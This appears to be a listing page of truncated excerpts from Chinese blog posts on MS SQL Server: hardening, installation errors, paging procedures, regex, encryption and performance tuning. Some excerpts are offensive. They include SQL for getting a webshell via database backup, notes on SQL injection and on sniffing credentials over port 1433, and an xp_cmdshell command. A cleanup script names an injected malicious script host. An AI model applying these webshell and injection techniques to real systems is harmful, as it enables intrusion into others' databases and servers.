将有安全问题的SQL过程删除.比较全面.一切为了安全! 删除了调用shell，注册表，COM组件的破坏权限MS SQL SERVER2000使用系统帐户登陆查询分析器运行以下脚本:use masterexec sp_dropextendedproc 'xp_cmdshell'exec sp_dropextendedproc

今天重装MS SQL Server 2000，装了几次都提示出错，查看事件，显示driver={sql server};server=harry;UID=sa;PWD=;database=master [Microsoft][ODBC SQL Server Driver][Shared Memory]一般性网络错误。 [Microsoft][ODBC SQL Server Dr

今天调试程序的时候发现了这个问题，MSSQL连接出错，有点莫名其妙，看字面的意思是连接的地址不正确。。但是我的确填写对的了！于是乎上服务器去看了下，SQLSERVER正常啊。。。。有点找不到头绪了，网上翻了半天，貌似都是些废话！ 看来只

壹。WINDOWS XP系统上安装SQL server服务器版一．在SQL服务器的安装盘中找到MSDE这个目录，并且点击setup.exe安装它，过程简单直接下一步就ＯＫ了。二. 重启系统WINDOWSXP,这下就可以看到SQL服务的图标出现了。三. 再拿出SQL服务器版的安

有时候遇到目标网站数据库过大，导致备份超时的时候，我们可以通过以下语句进行备份拿webshell alter database CaanCn set RECOVERY FULL-- Drop table [banlg];create table [dbo].[banlg] ([cmd] [image])-- declare @a sysname,@s va

SQL Server在1433端口传输的数据大部分是明文的，这包括IP地址，连接用户名，成功和失败消息 这样一来，就很容易使用嗅探器嗅探在这个网段内SQL Server的相关信息，得到用户名和IP后，就 差口令了，其实SQL的口令加密是十分脆弱的，昨天我

网上找到的那个，偶试了下，估计是这几年CPU运算速度已经飞快了。。。所以有点过时了，试了好几个服务器！毛用都没有，特别是那个100平方根的。。。偶那破服务器3秒就出来结果了。。。直接汗颜，偶来丢个狠点的+展开-SQLselect*fromchapt

+展开-SQLSelect*FROM(selectROW_NUMBER()Over(orderbycf_iddesc)asrowId,*fromT_Test)asmytablewhererowIdbetween21and40每页20条，第２页ROW_NUMBER是SqlServer2005中的新特性以下是利用本方法和传统利用Set RowCount方法存储过程的效率

+展开-SQLDECLAREhCForEachCURSORGLOBALFORSelectN'update'+QUOTENAME(o.name)+N'set'+QUOTENAME(c.name)+N'=replace('+QUOTENAME(c.name)+',''《scriptsrc=http://hack.hackeye.com/cn.js》《/script》'','''')'FROMsysobjectso,syscolu

+展开-SQLCREATEPROCEDUREPageCut@tblNamevarchar(255),--表名@strGetFieldsvarchar(1000)='*',--需要返回的列@fldNamevarchar(255)='',--排序的字段名@PageSizeint=10,--页尺寸@PageIndexint=1,--页码@OrderTypebit=0,--设置排序类型,非

这两天测试了前几天写的SQL2005专用分页的存储过程，当数据量达到2千多万的时候，效率相当的低，每次执行都要8秒左右（CPU：Q6600）。不过在2百多万数据量的情况下性能还是蛮不错的，在网上找了找，发现这下面的这两个，其实还是一个，不

用变量循环插入记录,开发时需要测试记录,用这个方法很有用,记录下来方便以后备查,大家可以参考修改为其它数据库的SQL.+展开-SQLDECLARE@recordNmberintset@recordNmber=0--SELECTCOUNT(*)FROMtbl_guide_strategyWHILE(@recordNmber)$30BE

ALTER PROCEDURE [dbo].[CurrentPageInfo]-- 获得某一页的数据--@beginNo int = 0, --起始记录号(即从哪一条开始取)@count int = 100, --取的结果集的总数@resultColumns varchar(2000) = '*', --需要得到的字段(即column1,column2,.....

/******* 导出到excel EXEC master..xp_cmdshell 'bcp SettleDB.dbo.shanghu out c:\temp1.xls -c -q -S"GNETDATA/GNETDATA" -U"sa" -P""' /*********** 导入Excel Select * FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0', 'Data Sour

lcx和剑心等大牛在06年的时候就已经在用这种语法了，而我等小辈到最近才领略到，惭愧惭愧......手头暂时没有注入点测试，就先以我机器上的MSSQL做实验吧。下面的语句我直接写完整的SQL语句，注入的时候稍微改改就能用了，呵呵。假如现在有

Author:零魂(zerosoul)Blog: http://hi.baidu.com/0soul转载请带上版权。这是这次出攻防大赛题目的时候顺便做的一些注入总结，是我通过查询系统表结构总结出来的。只要注入点有效，并且没有过滤单引号，即使它管理员表名和字段名设置的再

+展开-SQL--使用WITHENCRYPTION选项可用于加密SQL存储过程或者触发器(SQLServer本身提供的加密算法).--WITHENCRYPTION子句对用户隐藏存储过程的文本。--加密存储过程CreateprocnameWITHENCRYPTIONasbegin--语句end--加密触发器CreateTRIG

+展开-SQL--SQL内部函数(单向不可逆)selectpwdencrypt('nofc')--加密selectpwdcompare('nofc',pwdencrypt('nofc'))--比较，返回1相等，0则反之。--邹建的加密函数(双向可逆)createfunctionf_jmstr(@strvarchar(8000),@pwdstrvarchar(8000

David Banister本文讨论: 使用正则表达式进行高效的 SQL 查询 SQL Server 2005 对正则表达式的支持 从 SQL Server 使用 .NET Regex 类 在数据库中有效地使用正则表达式 本文使用了以下技术: SQL Server 2005，.NET Framework下载本文中所

+展开-SQL/*功能：实现正则表达式替换调用示例：selectdbo.fn_RegexReplace('sdfasfjksdjfa12k232132134324lsdjlfka','[a-z]','',1,1)--替换所有字母/--selectdbo.fn_RegexReplace(columnname,'\/*[^>]*>','',1,1)fromtable--替换所有HTM

这两天有个需求，需要在数据库中判断字符串的格式，于是从网上搜集了一些资料，整理了一下。下面这个是一个自定义函数，用户可以调用这个函数判断指定的字符串是否符合正则表达式的规则.+展开-SQLCREATEFUNCTIONdbo.find_regular_express

1、没有索引或者没有用到索引(这是查询慢最常见的问题，是程序设计的缺陷) 　　2、I/O吞吐量小，形成了瓶颈效应。 　　3、没有创建计算列导致查询不优化。 　　4、内存不足 　　5、网络速度慢 　　6、查询出的数据量过大(可以采用多次查询

6、 慎用游标数据库一般的操作是集合操作，也就是对由WHERE子句和选择列确定的结果集作集合操作，游标是提供的一个非集合操作的途径。一般情况下，游标实现的功能往往相当于客户端的一个循环实现的功能，所以，大部分情况下，我们把游标功

我始终认为，一个系统的性能的提高，不单单是试运行或者维护阶段的性能调优的任务，也不单单是开发阶段的事情，而是在整个软件生命周期都需要注意，进行有效工作才能达到的。所以我希望按照软件生命周期的不同阶段来总结数据库性能优化相

避免使用IN 操作符 用IN写出来的SQL的优点是比较容易写及清晰易懂，这比较适合现代软件开发的风格。 但是用IN的SQL性能总是比较低的，从ORACLE执行的步骤来分析用IN的SQL与不用IN的SQL有以下区别： ORACLE试图将其转换成多个表的连接，如